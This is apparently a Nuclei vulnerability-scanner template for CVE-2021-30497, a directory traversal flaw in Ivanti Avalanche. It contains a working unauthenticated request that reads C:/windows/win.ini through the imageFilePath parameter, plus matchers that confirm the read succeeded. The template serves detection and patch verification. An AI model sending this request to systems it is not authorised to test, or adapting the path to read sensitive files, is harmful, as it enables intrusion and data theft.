id: CVE-2021-30497
info:
name: Ivanti Avalanche Directory Traversal
author: gy741
severity: high
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
reference:
- https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-30497
tags: cve,cve2021,avalanche,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- type: status
status:
- 200